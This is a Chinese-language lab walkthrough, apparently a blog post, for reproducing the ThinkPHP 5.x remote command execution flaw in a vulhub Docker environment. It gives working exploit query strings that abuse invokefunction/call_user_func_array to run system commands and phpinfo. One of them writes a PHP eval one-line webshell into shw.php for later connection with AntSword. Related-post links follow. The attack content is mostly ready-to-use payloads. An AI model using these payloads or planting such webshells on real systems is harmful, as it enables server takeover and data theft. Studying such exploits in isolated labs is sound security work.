Thinkphp5x远程命令执行 靶场攻略

环境配置

云服务器:47.113.231.0:8080
靶场:vulhub/thinkphp/5-rce
docker-compose up -d #启动环境

漏洞复现

1.访问靶场:http://47.113.231.0:8080/

2.远程命令执⾏

POC:
?
s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]
[]=whoami

3.远程代码执行

POC:
?
s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[
1][]=-1

4.写入一句话木马到根目录下的shw.php

POC:
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php @eval(\$_POST[cmd]);?>" > shw.php

5.蚁剑连接

相关推荐
黑客Ash5 小时前
【D01】网络安全概论
网络·安全·web安全·php
->yjy5 小时前
计算机网络(第一章)
网络·计算机网络·php
阳光帅气男孩7 小时前
PhpSpreadsheet导出图片
php
周全全7 小时前
Spring Boot + Vue 基于 RSA 的用户身份认证加密机制实现
java·vue.js·spring boot·安全·php
Mr.Pascal8 小时前
刚学php序列化/反序列化遇到的坑(攻防世界:Web_php_unserialize)
开发语言·安全·web安全·php
建群新人小猿9 小时前
会员等级经验问题
android·开发语言·前端·javascript·php
黑客Ela12 小时前
网络安全问题概述
安全·web安全·php
Wh1teR0se12 小时前
详解php://filter--理论
web安全·php
李钢蛋17 小时前
PHP函数---function_exists()详解
开发语言·php